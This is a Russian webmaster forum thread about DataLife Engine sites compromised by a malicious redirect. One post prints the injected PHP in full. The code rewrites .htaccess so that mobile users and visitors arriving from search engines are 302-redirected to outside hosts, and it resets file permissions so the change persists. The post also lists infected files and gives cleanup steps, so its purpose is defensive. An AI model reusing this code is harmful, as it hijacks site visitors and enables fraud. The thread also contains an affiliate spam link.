Взлом dle проверяем файлы.
Страницы: Пред. 1 2 3 4 5 ... 7 След.
Взлом dle проверяем файлы., Вирус редирект в dle
Цитата
цтуе wnet пишет:
Кучка жалких школьников плакает, вай какая беда:)
Ну вы у нас прям дедушка)))smile:).Я вот далеко не школьник,у меня у самого дети в школу ходят и тем не менее тоже есть такая проблема .Есть парочка проектов на 9.7 (лицензия )и тоже нашел такой код,что заметил так это то что я пользовался разными ftp клиентами ,на хосте где заходил через filezilla везде был код ,а на другом где я заливал через Smart проблем не обнаружил! Может и всего лишь совпадение , но я всё равно сейчас все логи смотрю , вдруг найду что то интересное то отпишу)))
Пользуюсь filezilla на всех DLE сайтах пока тихо. тьфу,тьфу 
Держу сайты здесь, а ты не вздумай!
Я думал, что файл админки все переименовывают. Странно, что кто то этого не делает.
В Файлзиле файл с паролями вообще ни как не зашиврован, и открывается любым текстовым редактором. 
Осталось только утащить его трояном, тем более, что такой есть и он очень распространен.
У меня вроде чисто все. Может потому что я не пользуюсь этим фтп клиентом, и файл админки у меня переименован и запрятан, а admin.php фейковый
Никогда не сохраняйте файлы от фтп в FileZilla и ему подобных, сам один раз так пострадал, теперь ни одного пароля не сохраняю
Цитата
Blendos пишет:
Я думал, что файл админки все переименовывают. Странно, что кто то этого не делает.
Так же переименовываю, а в подменный ставлю страшную бабайку с криком чтобы опкакался на месте и срабу банит айпи:mocking:
Ага, у меня так же
smile:confused: не знаю из-за фризиллы или нет (Но я пользуюсь ей) вчера проверил сайт и обнаружил изменения в htaccess, из-за него не работала rss лента+ошибки.
Проверил др. файлы вроде норм. 

http://forum.dle-news.ru/index.php?showtopic=62025&st=40 - читаем сообщение от nowonline и тихо офигеваем.
Цитата
СашаУМ пишет:
не знаю из-за фризиллы или нет (Но я пользуюсь ей) вчера проверил сайт и обнаружил изменения в htaccess, из-за него не работала rss лента+ошибки.
Проверил др. файлы вроде норм.

http://forum.dle-news.ru/index.php?showtopic=62025&st=40 - читаем сообщение от nowonline и тихо офигеваем.
Да он сам школьник херов, делает 100500 ошибок
делайте более непроходимую регистрацию для любых пользователей, а лучше как я удали все шаблоны и скрипты генерации проверочных кодов и вопросов к регистрации, чтобы никто более не смог зарегаться и перевестись в Админы. Я так сделал и терь никто не может зарегаться без моего ведома. Среди ФТП могу посоветовать Дримвивер 8 рус. И чаще меняем пароли везде.
Регайтесь! Помогу с партнеркой! http://entercash.ru/index.php?refid_new=2349
Цитата
цтуе wnet пишет:
Кучка жалких школьников плакает, вай какая беда:)
Остряк самоучка? В любом случае, умным тебя не назовёшь smile:)
По теме- у кого какие изменения, опять залили или наоборот всё тихо?
Структура шелла  для общего ознакомления


Код
ini_set('display_errors', 0);
error_reporting(0);
$MaineURl = 'mobi-bro.com/l=3241101b056e0b4d03565714564f0e5820095d450a6e';
$MainHtaccess =
"
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]
RewriteCond %{HTTP_ACCEPT} 'text/vnd.wap.wml|application/vnd.wap.xhtml+xml' [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ $MaineURl [L,R=302]
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(www\.)?google\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^go\.mail\.ru/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?yandex\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?vk\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?ya\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?ask\.(ru|com|kz|com|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^googleads\.g\.doubleclick\.net/.*$ [NC]
RewriteRule ^(.*)$ goo.gl/gpWMY [R=302,L]
";
$MyKeyvord = $MaineURl;
$mPath = pathinfo($_SERVER['SCRIPT_FILENAME']
$nameFiles = $mPath['dirname'].'/.htaccess';
$StarHtaccess = file_get_contents($nameFiles);
preg_match('/(?<=RewriteRule).*(?=\[L\,R\=302\&#93/',$StarHtaccess, $matches);
$proverka = strpos($matches[0], $MyKeyvord);

if ($proverka === false) {
chmod($nameFiles,0666);
$NewHtaccess = $MainHtaccess. "\r\n" .$StarHtaccess;
$fp = fopen($nameFiles, "w");
fwrite($fp, $NewHtaccess);
fclose($fp);
} else {
chmod($nameFiles,0444);
}


Сколько бы вы не ставили права эта гадость будет их сбрасывать :


Код
if ($proverka === false) {
chmod($nameFiles,0666);
$NewHtaccess = $MainHtaccess. "\r\n" .$StarHtaccess;
$fp = fopen($nameFiles, "w");
fwrite($fp, $NewHtaccess);
fclose($fp);
} else {
chmod($nameFiles,0444);


}
Так что нужно полностью вырезать этот говно-код и ставить последний пачт.. Аппаратной сороки ответа шелла на другой сайт не было обнаружено как и самого шелла в DLE . Для того что бы быть полностью уверенными что все очистили проверять данные файлы:


Код
./index.php: header('Location: statuses.ws/');
./index.php: header('Location: statuses.ws/');
./engine/engine.php: header('Location: statuses.ws/');
./engine/engine.php: header('Location: statuses.ws/');
./engine/engine.php: header('Location: statuses.ws/');
./engine/engine.php: header('Location: statuses.ws/');
./engine/data/dbconfig.php: header('Location: statuses.ws/');
./engine/data/dbconfig.php: header('Location: statuses.ws/');
./engine/data/dbconfig.php: header('Location: statuses.ws/');
./engine/data/config.php: header('Location: statuses.ws/');
./engine/init.php: header('Location: statuses.ws/');
./engine/init.php: header('Location: statuses.ws/');
./engine/init.php: header('Location: statuses.ws/');


после полной очистки наберете в браузерную строку site.ru/index.php проверяете .htaccess на наличие вот такого кода :


Код
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(www\.)?google\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^go\.mail\.ru/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?yandex\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?vk\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?ya\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(www\.)?ask\.(ru|com|kz|com|ua|com\.ua)/.*$


Если после этих манипуляций у вас в .htaccess не появилась эта абракадабра, вы очистили сайт от данного вреда.
Изменено: _Support-DLE_ - 17 Января 2013 20:36
Цитата
_Support-DLE_ пишет:
нужно полностью вырезать этот говно-код
вы бы лучше сказали как так получилось что такая дыра образовалась - только на этом форуме порядка 30 чел пострадало
Пообщавшись с пострадавшими и порывшись в сети получилась такая картина- ломанули в основном сайты с открытой регистрацией, переименование файла admin.php эффекта не дает, так же заливают шелл. Пострадали не только нуллы а и лицензионные ДЛЕ.
_Support-DLE_,

Хочу купить движок, подскажите стабильную версию,
или взять 9,7?
Цитата
Анатолий пишет:

Хочу купить движок, подскажите стабильную версию,
или взять 9,7?
Уже есть DataLife Engine v.9.8 Press Release
Страницы: Пред. 1 2 3 4 5 ... 7 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
20:34 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
18:58 Как грамотно и эффективно монетизировать форум? 
17:13 Как правильно покупать ссылки для поддомена? 
17:10 Стоит ли добавлять сайт в Rambler топ 100? 
17:10 МТС разуверилась в своём заменителе YouTube 
14:22 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
13:55 Ищу специалистов 
21:47 Продам игровой форум! 
18:08 Прием платежей для HIGH RISK | Прием платежей без сайта 
18:05 Услуги рассылки Viber|Whatsapp|IMO. 
18:03 Рассылка в TELEGRAM |Большой опыт работы | Любые тематики | Лучшая конверсия 
15:52 JustProxy.Biz - Резидентные прокси без ограничения по трафику 
13:15 TETChange-Обменник криптовалют 
05:46 Комплексный прогон по трастовым сайтам, статейное размещение. Рост НЧ-СЧ, Тиц-пр. 
18:52 150+ хакерских поисковых систем и инструментов 
17:16 Китайский ИИ-ассистент DeepSeek начали запрещать в некоторых странах 
21:48 Точные прогнозы на футбол 
14:43 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 
22:39 С юмором по жизни! 
22:21 Telegram не смог провести различие между требованиями автократических режимов и законными демократическими запросами 
22:19 Подтягиваем физкультурку